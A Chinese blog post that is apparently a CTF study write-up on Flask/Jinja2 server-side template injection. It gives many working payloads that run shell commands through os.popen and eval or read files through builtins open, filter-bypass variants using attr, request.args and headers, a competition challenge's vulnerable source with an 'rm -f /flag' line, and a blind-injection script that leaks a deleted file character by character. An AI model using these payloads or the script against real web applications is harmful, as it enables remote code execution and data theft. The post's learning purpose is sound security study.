
<!DOCTYPE html>
<html lang="en" class="loading">
<head>
    <meta charset="UTF-8" />
    <meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1" />
    <meta name="viewport" content="width=device-width, minimum-scale=1.0, maximum-scale=1.0, user-scalable=no">
    <title>FlaskSSti - 月出从云</title>
    <meta name="apple-mobile-web-app-capable" content="yes" />
    <meta name="apple-mobile-web-app-status-bar-style" content="black-translucent">
    <meta name="google" content="notranslate" />
    <meta name="keywords" content="Fechin,"> 
    <meta name="description" content="一直对ssti比较模糊，遇见的时候都是网上去照抄payload去打，自己没有什么主动构造payload的能力，这次遇见一道题决定总结一些该怎么做


1.hackbar 自带的payload如何构成,"> 
    
    <link rel="alternative" href="atom.xml" title="月出从云" type="application/atom+xml"> 
    <link rel="icon" href="/img/1.ico"> 
    
<link rel="stylesheet" href="//cdn.jsdelivr.net/npm/gitalk@1/dist/gitalk.css">

    
<link rel="stylesheet" href="/css/diaspora.css">

	<script async src="//pagead2.googlesyndication.com/pagead/js/adsbygoogle.js"></script>
    <script>
         (adsbygoogle = window.adsbygoogle || []).push({
              google_ad_client: "ca-pub-8691406134231910",
              enable_page_level_ads: true
         });
    </script>
    <script async custom-element="amp-auto-ads"
        src="https://cdn.ampproject.org/v0/amp-auto-ads-0.1.js">
    </script>
<meta name="generator" content="Hexo 5.2.0"></head>

<body class="loading">
    <span id="config-title" style="display:none">月出从云</span>
    <div id="loader"></div>
    <div id="single">
    <div id="top" style="display: block;">
    <div class="bar" style="width: 0;"></div>
    <a class="iconfont icon-home image-icon" href="javascript:;" data-url="http://example.com"></a>
    <div title="播放/暂停" class="iconfont icon-play"></div>
    <h3 class="subtitle">FlaskSSti</h3>
    <div class="social">
        <div>
            <div class="share">
                <a title="获取二维码" class="iconfont icon-scan" href="javascript:;"></a>
            </div>
            <div id="qr"></div>
        </div>
    </div>
    <div class="scrollbar"></div>
</div>

    <div class="section">
        <div class="article">
    <div class='main'>
        <h1 class="title">FlaskSSti</h1>
        <div class="stuff">
            <span>十月 27, 2020</span>
            
  <ul class="post-tags-list" itemprop="keywords"><li class="post-tags-list-item"><a class="post-tags-list-link" href="/tags/ssti/" rel="tag">ssti</a></li></ul>


        </div>
        <div class="content markdown">
            <p>一直对ssti比较模糊，遇见的时候都是网上去照抄payload去打，自己没有什么主动构造payload的能力，这次遇见一道题决定总结一些该怎么做</p>
<a id="more"></a>

<h1 id="1-hackbar-自带的payload如何构成的"><a href="#1-hackbar-自带的payload如何构成的" class="headerlink" title="1.hackbar 自带的payload如何构成的"></a>1.hackbar 自带的payload如何构成的</h1><p>第一件事情，就是搭建我们的环境：</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">from</span> flask <span class="keyword">import</span> Flask, request, render_template_string</span><br><span class="line"></span><br><span class="line">app = Flask(__name__)</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="meta">@app.route(&#x27;/&#x27;, methods=[&#x27;POST&#x27;, &#x27;GET&#x27;])</span></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">index</span>():</span></span><br><span class="line">    <span class="built_in">id</span> = request.args.get(<span class="string">&quot;id&quot;</span>)</span><br><span class="line">    html = <span class="string">&#x27;&#x27;&#x27;&lt;h1&gt;%s&lt;/h1&gt; &#x27;&#x27;&#x27;</span> % (<span class="built_in">id</span>)</span><br><span class="line">    <span class="keyword">return</span> render_template_string(html)</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="keyword">if</span> __name__ == <span class="string">&#x27;__main__&#x27;</span>:</span><br><span class="line">    app.run(host=<span class="string">&#x27;0.0.0.0&#x27;</span>, port=<span class="number">80</span>)</span><br><span class="line"></span><br></pre></td></tr></table></figure>

<p>这种就是最基本的flask，在flask当中jinjia的模板，我们使用两个花括号就可以允许一些基本的运算 用于执行if，for循环等等，那么我们一个最基本的payload的构造方式是该怎么触发呢？第一步，从config类触发，因为Flask里面自带</p>
<figure class="highlight"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">http://localhost/?id=&#123;&#123; config.items() &#125;&#125;</span><br></pre></td></tr></table></figure>

<p><img src="F:\MyGitBlog\themes\diaspora\source\img\image-20201026173228975.png" alt="image-20201026173228975"></p>
<p>通过这个类我们可以得到所有的flask的config~，而这一的意义好像不是很大？我们得不到很多东西，但是我们可以用这个作为跳板，执行下一步</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">.__class__.__init__</span><br></pre></td></tr></table></figure>

<p>__class方法属性的时候会只想该实例对应的类，此时config的类是Config,然后可以再去调用其它类属性，如果我们审计了源码，就可以知道我们此时的Config类位于config.py80多行，当我们执行__init__之后，便可以在下面的101行找到这么一行代码：</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">rv = os.environ.get(variable_name)</span><br></pre></td></tr></table></figure>

<p>也就是说，我们的config类当中含有os库的方法，如果我们直接使用是不行的，但我们可以通过globals函数先获取到它，于是得到：</p>
<p><strong>globals()</strong> 函数会以字典类型返回当前位置的全部全局变量,在交互模式下：</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">__globals__</span><br></pre></td></tr></table></figure>

<p>于是我们拼接得到如下的payload:</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">config.__class__.__init__.__globals__</span><br></pre></td></tr></table></figure>

<p>可以得到：</p>
<p><img src="F:\MyGitBlog\themes\diaspora\source\img\image-20201026175828323.png" alt="image-20201026175828323"></p>
<p>我们用下面这个方式来获取os库，利用__dict这个方法来查看os库哪些可以给我们进行使用</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">.__globals__[<span class="string">&#x27;os&#x27;</span>]</span><br></pre></td></tr></table></figure>

<p>我们能够找到system，但是我们用该方法却无法得到回显，该方法只不过是成功的时候返回1，失败了则是返回0</p>
<p>执行如下：</p>
<figure class="highlight"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">http://localhost/</span><br><span class="line">?id=&#123;&#123;%20config.__class__.__init__.__globals__[&#x27;os&#x27;].system(&#x27;dir()&#x27;)&#125;&#125;</span><br></pre></td></tr></table></figure>

<p>得到1或者0对于我们来说意义不大，当然这样也可以进行盲注【，而popen则可以返回文件对象</p>
<p><strong>os.popen</strong> </p>
<p>　　该方法不但执行命令还返回执行后的信息对象，是通过一个管道文件将结果返回。</p>
<p>　　output = os.popen(‘cat /proc/cpuinfo’)</p>
<p>　　print output.read()</p>
<p>于是我们构造最终的payload：</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&#123;&#123;config.__class__.__init__.__globals__[<span class="string">&#x27;os&#x27;</span>].popen(<span class="string">&#x27;dir()&#x27;</span>).read()&#125;&#125;</span><br></pre></td></tr></table></figure>

<h2 id="1-2-config以外的思路"><a href="#1-2-config以外的思路" class="headerlink" title="1.2 config以外的思路"></a>1.2 config以外的思路</h2><p>其他的一些思路，首先，我们的config被过滤了，我们该怎么办呢？除此之外，我们还可以通过()和’’分别获取到tuple和str的初始化~</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line"><span class="string">&#x27;&#x27;</span>.__class__.__name__  <span class="comment">#得到str</span></span><br><span class="line">()_.__class__.__name__ <span class="comment">#tuple</span></span><br></pre></td></tr></table></figure>

<p>这时引入base和mro的魔术方法</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">bases : 类的基类的元组，顺序为它们在基类列表中出现的顺序（基类就是Object类~）</span><br><span class="line">mro :类的父类，从父类网上找，最终会找到基类，所以mro[<span class="number">-1</span>]等价于__bases__</span><br></pre></td></tr></table></figure>

<p><img src="F:\MyGitBlog\themes\diaspora\source\img\image-20201026184448939.png" alt="image-20201026184448939"></p>
<p>这时候我们就想到的，我们既然得到了基类，是不是就想要所有的子类了呢？毕竟子类的内容我们更加感兴趣，我们最终的目标就是找到os库对吧。而python正好拥有这个魔术方法</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">__subclasses__ <span class="comment">#获取所有的子类方法</span></span><br></pre></td></tr></table></figure>

<p>之后慢慢去寻找即可，该文章中有，在catch_warnnings模块下含有builtins，我们可以用这个去找eval：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">&#123;&#123; [].__class__.__mro__[-1].__subclasses__()[192].__init__.__globals__. __builtins__[&#39;eval&#39;](&quot;__import__(&#39;os&#39;).popen(&#39;dir()&#39;).read()&quot;)    &#125;&#125;</span><br><span class="line"></span><br></pre></td></tr></table></figure>

<h2 id="1-3总结做题的思路："><a href="#1-3总结做题的思路：" class="headerlink" title="1.3总结做题的思路："></a>1.3总结做题的思路：</h2><p>总而言之，我们要么去找builtins函数下的eval，要么去找os。</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">str&#x3D; %EF%B9%9B%EF%B9%9Bself.__dict__._TemplateReference__context.lipsum.__globals__.__builtins__.open(request.args.x1).read()%EF%B9%9C%EF%B9%9C</span><br></pre></td></tr></table></figure>



<h1 id="2-谈谈过滤"><a href="#2-谈谈过滤" class="headerlink" title="2.谈谈过滤"></a>2.谈谈过滤</h1><p>在某些情况下，会遇见各种各样的过滤，比如我们遇见对config的过滤，以及os过滤啊等等</p>
<h2 id="2-1-过滤了os，system等的情况"><a href="#2-1-过滤了os，system等的情况" class="headerlink" title="2.1 过滤了os，system等的情况"></a>2.1 过滤了os，system等的情况</h2><p>在这种情况下我们也不需慌，如果只是对中括号中可能用到的内容进行过滤的话，我们完全可以通过拼接绕过：</p>
<p>比如我们之前的payload修改成：</p>
<figure class="highlight"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">?id=&#123;&#123; config.__init__.__globals__[&#x27;o&#x27;+&#x27;s&#x27;].popen(&#x27;dir&#x27;).read() &#125;&#125;</span><br></pre></td></tr></table></figure>

<h2 id="2-2-过滤了中括号"><a href="#2-2-过滤了中括号" class="headerlink" title="2.2 过滤了中括号"></a>2.2 过滤了中括号</h2><p>这样的话,可以用getitem方法，该方法等价于一个迭代器的选择，开发者的原意是让人们可以用这个迭代对象,这篇文章讲的不错</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">https:&#x2F;&#x2F;blog.csdn.net&#x2F;qq_24805141&#x2F;article&#x2F;details&#x2F;81411775</span><br></pre></td></tr></table></figure>

<p>Python的魔法方法<code>__getitem__</code> 可以让对象实现迭代功能，这样就可以使用<code>for...in...</code> 来迭代该对象了，同时也允许我们利用gettiem来直接选择内容,所以我们之前的payload：</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&#123;&#123; config.__init__.__globals__.__getitem__(<span class="string">&#x27;os&#x27;</span>).popen(<span class="string">&#x27;dir()&#x27;</span>).read() &#125;&#125;</span><br></pre></td></tr></table></figure>

<p>利用request起步</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&#123;&#123; request.__class__.__mro__.__getitem__(<span class="number">-1</span>).__subclasses__().__getitem__(<span class="number">192</span>).__init__.__globals__.__builtins__.__getitem__(<span class="string">&#x27;eval&#x27;</span>)(<span class="string">&quot;__import__(&#x27;os&#x27;).popen(&#x27;dir()&#x27;).read()&quot;</span>) &#125;&#125;</span><br></pre></td></tr></table></figure>

<h2 id="2-3-过滤了-号"><a href="#2-3-过滤了-号" class="headerlink" title="2.3 过滤了.号"></a>2.3 过滤了.号</h2><p>这个可以使用attr来进行绕过了，直接给出绕过方法：</p>
<p>所以之前的payload进行对比：</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">[].__class__ = []|attr(__class__)</span><br><span class="line">&#123;&#123;[]|attr(<span class="string">&#x27;__class__&#x27;</span>)|attr(<span class="string">&#x27;__base__&#x27;</span>)|attr(<span class="string">&#x27;__subclasses__&#x27;</span>)()  &#125;&#125;</span><br><span class="line"></span><br><span class="line">&#123;&#123;   ([]|attr(<span class="string">&#x27;__class__&#x27;</span>)|attr(<span class="string">&#x27;__base__&#x27;</span>)|attr(<span class="string">&#x27;__subclasses__&#x27;</span>)())[<span class="number">190</span>]  &#125;&#125;</span><br><span class="line"></span><br></pre></td></tr></table></figure>

<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">&#123;&#123;   ([]|attr(<span class="string">&#x27;__class__&#x27;</span>)|attr(<span class="string">&#x27;__base__&#x27;</span>)|attr(<span class="string">&#x27;__subclasses__&#x27;</span>)())[<span class="number">192</span>]|attr(<span class="string">&#x27;__init__&#x27;</span>)|attr(<span class="string">&#x27;__globals__&#x27;</span>)|attr(<span class="string">&#x27;__builtins__&#x27;</span>)|attr(__getitem__)(<span class="string">&#x27;eval&#x27;</span>)  &#125;&#125;</span><br><span class="line">    <span class="comment"># 拼到这里拼不下去了。。请问有人知道为什么嘛,eval无论如何都取不到了</span></span><br></pre></td></tr></table></figure>

<p>不知道为什么在我从上往下继续取值的时候，怎么都没法继续向下取值了。但是看见可以转换思路</p>
<h2 id="2-5利用request"><a href="#2-5利用request" class="headerlink" title="2.5利用request"></a>2.5利用request</h2><p>​    因为flask此时能允许用户自定义输出，十有八九是有request的，所以我们去利用这个也不是相当不错的</p>
<p>这里翻阅到了一个老外思路，但是他没给全。</p>
<figure class="highlight"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">http://localhost/?id=&#123;&#123;request|attr([request.args.usc*2,request.args.class,request.args.usc*2]|join)|attr(&#x27;__base__&#x27;)      &#125;&#125;&amp;class=class&amp;usc=_&amp;init=init</span><br></pre></td></tr></table></figure>

<p>利用request的思路去重新把payload拼出来</p>
<figure class="highlight"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">?id=&#123;&#123;[][request[&#x27;args&#x27;][&#x27;class&#x27;]][request[&#x27;args&#x27;][&#x27;base&#x27;]][request[&#x27;args&#x27;][&#x27;subclasses&#x27;]]()[153][request[&#x27;args&#x27;][&#x27;dict&#x27;]][request[&#x27;args&#x27;][&#x27;init&#x27;]][request[&#x27;args&#x27;][&#x27;globals&#x27;]][request[&#x27;args&#x27;][&#x27;builtins&#x27;]][&#x27;eval&#x27;](request[&#x27;args&#x27;][&#x27;payload&#x27;])&#125;&#125;&amp;base=__base__&amp;subclasses=__subclasses__&amp;dict=__dict__&amp;init=__init__&amp;globals=__globals__&amp;builtins=__builtins__&amp;class=__class__&amp;payload=__import__(&#x27;os&#x27;).popen(&#x27;dir()&#x27;).read()</span><br></pre></td></tr></table></figure>



<h2 id="2-4将中括号和-号都过滤情况下"><a href="#2-4将中括号和-号都过滤情况下" class="headerlink" title="2.4将中括号和.号都过滤情况下"></a>2.4将中括号和.号都过滤情况下</h2><p>当然上面的难度都是相当简单的题目才会遇见了，在当前环境下，往往会过滤的相当严格，我们应该从flask本身出现的类开始找，比如题目可能验证的时候，仅仅验证我们输入的id。但是我们可以利用此，让flask读取header中的内容，这样就可以打破限制</p>
<p>我们可以先写一个脚本：</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><span class="line">http://localhost/</span><br><span class="line">?id=&#123;% for c in [].__class__.__base__.__subclasses__() %&#125;</span><br><span class="line">&#123;% <span class="keyword">if</span> c.__name__ == <span class="string">&#x27;catch_warnings&#x27;</span> %&#125;</span><br><span class="line">  &#123;% <span class="keyword">for</span> b <span class="keyword">in</span> c.__init__.__globals__.values() %&#125;</span><br><span class="line">  &#123;% <span class="keyword">if</span> b.__class__ == &#123;&#125;.__class__ %&#125;</span><br><span class="line">    &#123;% <span class="keyword">if</span> <span class="string">&#x27;eval&#x27;</span> <span class="keyword">in</span> b.keys() %&#125;</span><br><span class="line">      &#123;&#123; b[<span class="string">&#x27;eval&#x27;</span>](<span class="string">&#x27;__import__(&quot;os&quot;).popen(&quot;dir()&quot;).read()&#x27;</span>) &#125;&#125;       </span><br><span class="line">    &#123;% endif %&#125;</span><br><span class="line">  &#123;% endif %&#125;</span><br><span class="line">  &#123;% endfor %&#125;</span><br><span class="line">&#123;% endif %&#125;</span><br><span class="line">&#123;% endfor %&#125;</span><br></pre></td></tr></table></figure>

<p>之后为了绕过括号的限制，采用这种方法：</p>
<p>这里给出一个payload：</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br></pre></td><td class="code"><pre><span class="line">&#123;% <span class="keyword">for</span> c <span class="keyword">in</span> []|attr(request.headers.x1)|attr(request.headers.x2)|attr(request.headers.x3)() %&#125;</span><br><span class="line">    &#123;% <span class="keyword">if</span> c|attr(request.headers.x4)==request.headers.x5 %&#125;</span><br><span class="line">    &#123;%<span class="keyword">for</span> d <span class="keyword">in</span> ((c|attr(request.headers.x6)|attr(request.headers.x7))[request.headers.x8])%&#125;</span><br><span class="line">        &#123;%<span class="keyword">if</span> d==request.headers.x9%&#125;&#123;&#123;((c|attr(request.headers.x6)|attr(request.headers.x7))[request.headers.x8])[d](request.headers.x13)&#125;&#125;</span><br><span class="line">        &#123;% endif %&#125;</span><br><span class="line">    &#123;% endfor %&#125;</span><br><span class="line">    &#123;% endif%&#125;</span><br><span class="line">&#123;% endfor %&#125; </span><br><span class="line"></span><br><span class="line">x13: </span><br><span class="line">x9: <span class="built_in">eval</span></span><br><span class="line">x8: __builtins__</span><br><span class="line">x7: __globals__</span><br><span class="line">x6: __init__</span><br><span class="line">x5: catch_warnings</span><br><span class="line">x4: __name__</span><br><span class="line">x3: __subclasses__</span><br><span class="line">x2: __base__</span><br><span class="line">x1: __class__</span><br></pre></td></tr></table></figure>

<h2 id="2-6-过滤了单引号和双引号的情况"><a href="#2-6-过滤了单引号和双引号的情况" class="headerlink" title="2.6 过滤了单引号和双引号的情况"></a>2.6 过滤了单引号和双引号的情况</h2><p>在这种情况下，我们就只能去尝试查找各类的open函数了，没有办法执行命令了，于是查找到：</p>
<figure class="highlight txt"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">self.__dict__._TemplateReference__context.lipsum.__globals__.__builtins__.open(&quot;flag&quot;).read()</span><br></pre></td></tr></table></figure>

<p>之后为了绕过引号的过滤，我们尝试使用request.args.x1的方式进行绕过</p>
<p>拼凑得：</p>
<h2 id="2-7-读取文件"><a href="#2-7-读取文件" class="headerlink" title="2.7 读取文件"></a>2.7 读取文件</h2><figure class="highlight txt"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">?id=&#123;&#123; self.__dict__._TemplateReference__context.lipsum.__globals__.__builtins__.open(request.args.x1).read() &#125;&#125;&amp;x1=flag</span><br></pre></td></tr></table></figure>

<p>而实际上，我发现中括号也是可以进行替代的</p>
<figure class="highlight txt"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&#123;&#123; [].__class__.__mro__[-1].__subclasses__()[192].__init__.__globals__. __builtins__[request.args.x1](&quot;__import__(&#x27;os&#x27;).popen(&#x27;dir()&#x27;).read()&quot;)    &#125;&#125;&amp;x1=eval</span><br></pre></td></tr></table></figure>

<p>拼凑得出：</p>
<figure class="highlight txt"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&#123;&#123; config.__class__.__init__.__globals__[request.args.x1].popen(request.args.x2).read() &#125;&#125;&amp;x1=os&amp;x2=dir</span><br></pre></td></tr></table></figure>



<h2 id="2-8过滤了eval，popen，两个左花括号"><a href="#2-8过滤了eval，popen，两个左花括号" class="headerlink" title="2.8过滤了eval，popen，两个左花括号"></a>2.8过滤了eval，popen，两个左花括号</h2><p>这里记录一下自己学习到的一道题目：</p>
<h3 id="上海市网络安全大赛："><a href="#上海市网络安全大赛：" class="headerlink" title="上海市网络安全大赛："></a>上海市网络安全大赛：</h3><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">from</span> flask <span class="keyword">import</span> Flask,request,render_template</span><br><span class="line"><span class="keyword">from</span> jinja2 <span class="keyword">import</span> Template</span><br><span class="line"><span class="keyword">import</span> os</span><br><span class="line"></span><br><span class="line">app = Flask(__name__)</span><br><span class="line"></span><br><span class="line">f = <span class="built_in">open</span>(<span class="string">&#x27;/flag&#x27;</span>,<span class="string">&#x27;r&#x27;</span>)</span><br><span class="line">flag = f.read()</span><br><span class="line"><span class="meta">@app.route(&#x27;/&#x27;,methods=[&#x27;GET&#x27;,&#x27;POST&#x27;])</span></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">home</span>():</span>__</span><br><span class="line">    name = request.args.get(<span class="string">&quot;name&quot;</span>) <span class="keyword">or</span> <span class="string">&quot;&quot;</span></span><br><span class="line">    print(name)</span><br><span class="line">    <span class="keyword">if</span> name:</span><br><span class="line">        <span class="keyword">return</span> render_template(<span class="string">&#x27;index.html&#x27;</span>,name=name)</span><br><span class="line">    <span class="keyword">else</span>:</span><br><span class="line">        <span class="keyword">return</span> render_template(<span class="string">&#x27;index.html&#x27;</span>)</span><br><span class="line"></span><br><span class="line"><span class="meta">@app.route(&#x27;/help&#x27;,methods=[&#x27;GET&#x27;])</span></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">help</span>():</span></span><br><span class="line">    <span class="built_in">help</span> = <span class="string">&#x27;&#x27;&#x27;</span></span><br><span class="line"><span class="string">    &#x27;&#x27;&#x27;</span></span><br><span class="line">    <span class="keyword">return</span> f.read()</span><br><span class="line"></span><br><span class="line"><span class="meta">@app.errorhandler(404)</span></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">page_not_found</span>(<span class="params">e</span>):</span></span><br><span class="line">    <span class="comment">#No way to get flag!</span></span><br><span class="line">    os.system(<span class="string">&#x27;rm -f /flag&#x27;</span>)</span><br><span class="line">    url = name = request.args.get(<span class="string">&quot;name&quot;</span>) <span class="keyword">or</span> <span class="string">&quot;&quot;</span></span><br><span class="line">    r = request.path</span><br><span class="line">    r = request.data.decode(<span class="string">&#x27;utf8&#x27;</span>)</span><br><span class="line">    <span class="keyword">if</span> <span class="string">&#x27;eval&#x27;</span> <span class="keyword">in</span> r <span class="keyword">or</span> <span class="string">&#x27;popen&#x27;</span> <span class="keyword">in</span> r <span class="keyword">or</span> <span class="string">&#x27;&#123;&#123;&#x27;</span> <span class="keyword">in</span> r:</span><br><span class="line">        t = Template(<span class="string">&quot; Not found!&quot;</span>)</span><br><span class="line">        <span class="keyword">return</span> render_template(t), <span class="number">404</span></span><br><span class="line">    t = Template(r + <span class="string">&quot; Not found!&quot;</span>)</span><br><span class="line">    <span class="keyword">return</span> render_template(t), <span class="number">404</span></span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="keyword">if</span> __name__ == <span class="string">&#x27;__main__&#x27;</span>:</span><br><span class="line">    app.run(host=<span class="string">&#x27;0.0.0.0&#x27;</span>,port=<span class="number">8888</span>)</span><br></pre></td></tr></table></figure>

<p>这道题比较新有意思的点在两个地方：</p>
<p>过滤了这个地方：</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">if</span> <span class="string">&#x27;eval&#x27;</span> <span class="keyword">in</span> r <span class="keyword">or</span> <span class="string">&#x27;popen&#x27;</span> <span class="keyword">in</span> r <span class="keyword">or</span> <span class="string">&#x27;&#123;&#123;&#x27;</span> <span class="keyword">in</span> r:</span><br></pre></td></tr></table></figure>

<p>过滤了{ {} },这样子的情况以前自己没有遇过，后来知道可以进行盲注，并且我们可以尝试读取文件，读取文件的payload如下：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&#123;% if self.__dict__._TemplateReference__context.lipsum.__globals__.__builtins__.open(&quot;your file name &quot;).read()[1:2] &#x3D;&#x3D; &quot;a&quot; %&#125;~p0~&#123;% endif %&#125;</span><br></pre></td></tr></table></figure>

<p>如果满足条件，则会输出<del>p0</del>，否则就不会输出。第二点，我们该读取什么文件呢？</p>
<p>这里运用了os.system(“rm -f /flag”)</p>
<p>默认的进程删除后会存放在暂时文件中，进程为：</p>
<figure class="highlight txt"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">/proc/self/fd/3</span><br></pre></td></tr></table></figure>

<p>故编写脚本如下：</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">import</span> requests</span><br><span class="line"><span class="keyword">import</span> string</span><br><span class="line">url = <span class="string">&#x27;http://eci-2ze006f3h1dkgrldoskz.cloudeci1.ichunqiu.com:8888/a&#x27;</span></span><br><span class="line">headers=&#123;</span><br><span class="line">    <span class="string">&#x27;Content-Type&#x27;</span>:<span class="string">&#x27;application/json&#x27;</span></span><br><span class="line">&#125;</span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">check</span>(<span class="params">payload</span>):</span></span><br><span class="line">    r = requests.post(url, data=payload,headers=headers).text</span><br><span class="line">    <span class="keyword">return</span> <span class="string">&#x27;~p0~&#x27;</span> <span class="keyword">in</span> r</span><br><span class="line"></span><br><span class="line">password  = <span class="string">&#x27;&#x27;</span></span><br><span class="line">sa=string.printable</span><br><span class="line"><span class="comment">#print(s)</span></span><br><span class="line"><span class="keyword">for</span> i <span class="keyword">in</span> <span class="built_in">range</span>(<span class="number">0</span>,<span class="number">100</span>):</span><br><span class="line">    <span class="keyword">for</span> c <span class="keyword">in</span> sa:</span><br><span class="line">        payload=<span class="string">&#x27;&#123;% if self.__dict__._TemplateReference__context.lipsum.__globals__.__builtins__.open(&quot;/proc/self/fd/3&quot;).read()[&#x27;</span> + <span class="built_in">str</span>(i) + <span class="string">&#x27;:&#x27;</span> + <span class="built_in">str</span>(</span><br><span class="line">            i + <span class="number">1</span>) + <span class="string">&#x27;] == &quot;&#x27;</span> + c + <span class="string">&#x27;&quot; %&#125;~p0~&#123;% endif %&#125;&#x27;</span></span><br><span class="line">        <span class="comment"># print(payload)</span></span><br><span class="line">        <span class="keyword">if</span> check(payload):</span><br><span class="line">            password += c</span><br><span class="line">            <span class="keyword">break</span></span><br><span class="line">    print(password)</span><br></pre></td></tr></table></figure>

<p>脚本：</p>
